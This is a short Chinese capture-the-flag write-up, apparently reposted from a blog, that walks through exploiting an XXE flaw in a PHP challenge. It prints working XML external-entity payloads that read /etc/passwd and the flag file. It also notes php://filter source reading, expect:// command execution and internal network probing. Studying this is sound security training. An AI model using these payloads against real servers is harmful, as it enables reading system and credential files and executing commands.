4、PHP的xml注入漏洞（xxe）

时间:2025/7/13 13:20:09来源：https://blog.csdn.net/weixin_51520483/article/details/139095473 浏览次数:0次

青少年ctf：PHP的XXE

1、打开网页是一个PHP版本页面

2、CTRL+f搜索xml，发现2.8.0版本，含有xml漏洞

3、bp抓包

4、使用代码出发bug

GET /simplexml_load_string.php HTTP/1.1

补充：

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>/* 
1.读取任意文件
file 协议，file:///etc//passwd
php 协议，php://filter/read=convert.base64-encode/resource=index.php
2.执行系统命令
PHP环境中PHP的expect模块被加载
expect://ipconfig
3.内网探测
http：//192.168.0.128:80
参见：https://xz.aliyun.com/t/3357#toc-11
*/

5、在触发bug的包下面加上，获取flag

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>&xxe;</name>
</root>

6、查看其他文件etc/passwd

拓展内容：一篇文章带你深入理解漏洞之 XXE 漏洞 - 先知社区

关键字：4、PHP的xml注入漏洞（xxe）

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

责任编辑：

>> 相关文章

>> 热门图片

设计师服务平台网_石家庄网络公司行业_百度搜索风云榜小说排行榜_百度推广怎么使用教程

美食静态网站设计论文_潍坊外贸建站_百度搜索数据统计_百度知道合伙人官网登录入口

新手如何学剪辑视频_诸暨做幕墙连接件的公司_苏州关键词优化软件_网站的优化

网页设计制作方法_设立深圳公司_济南网站推广优化_怎么申请域名建网站

龙岗seo网络推广_通过一个站点的建设方案_长春网站开发公司_昆明做网站的公司

杭州建站模板系统_平面设计找工作_什么是精准营销_中央下令全国各地核酸检测

有限责任公司注册资金_私人搭建服务器_清远网站seo_智能识别图片

国际新闻最新消息今天简讯_app是什么意思的缩写_sem是指什么_恶意点击软件哪几种

>> 热门搜索

评论排行

图片新闻

更多>>

4、PHP的xml注入漏洞（xxe）

360建筑网个人信息怎么改_电商网站有哪些功能_seo关键词_企拓客软件多少钱

教育机构网站_常州被约谈企业主公司发告_落实好疫情防控优化措施_百度知道一下

【Linux】任务管理

点击排行